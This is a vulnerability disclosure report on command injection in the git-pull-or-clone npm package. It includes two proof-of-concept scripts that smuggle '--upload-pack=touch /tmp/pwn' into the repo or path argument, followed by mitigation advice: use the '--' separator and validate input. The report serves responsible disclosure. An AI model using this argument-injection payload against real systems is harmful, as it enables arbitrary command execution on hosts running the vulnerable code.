git-pull-or-clone describes itself as a tool to ensure a git repo exists on disk and that it's up-to-date.
Resources:
- Project's GitHub source code: https://github.com/feross/git-pull-or-clone
- Project's npm package: https://npmjs.org/package/git-pull-or-clone
I'm reporting a Command Injection vulnerability in the git-pull-or-clone npm package.
The --upload-pack option of git is also accepted by git clone, and allows users to execute arbitrary commands on the OS.
The source uses the secure child process API spawn() (see here: https://github.com/feross/git-pull-or-clone/blob/master/index.js#L28-L33); however, the outPath parameter passed to it may be interpreted as a command-line argument to the git clone command, resulting in arbitrary command injection.
If users control either the URL (url) to clone or the directory path (outPath) to clone it into, the vulnerability applies.
Install git-pull-or-clone@2.0.1, which is the latest.
POC 1:
const gitPullOrClone = require('git-pull-or-clone')
const repo = 'file:///tmp/zero12345'
const path = '--upload-pack=touch /tmp/pwn3'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err
  console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn3
POC 2:
const gitPullOrClone = require('git-pull-or-clone')
const repo = '--upload-pack=touch /tmp/pwn4'
const path = 'file:///tmp/zero12345'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err
  console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn4
Liran Tal
Hi buddy! Thanks for replying promptly on this. I'm happy to help on this and will suggest the following strategies to mitigate the issue:
- Use the end-of-options (--) notation, for example: git clone -- <repo> <directory>, in which case even if a user controls the value, it won't be treated as an argument to git clone.
- Validate the input, for example by checking that the url starts with git@ or with https://. You can also harden the input by checking that it indeed exists on disk before you pass that input to git clone.
I haven't prepared a fix in advance, and it being almost 11pm here it's not something I could establish promptly, but I will do my best to clear out some of my schedule between tomorrow and Thursday to send you a patch.
p.s. it seems like I have accidentally disclosed another module that is vulnerable to this and the team has been reaching out to them too so I appreciate it if you indeed don't share anything about that. I updated this gist to remove that mention. Thanks!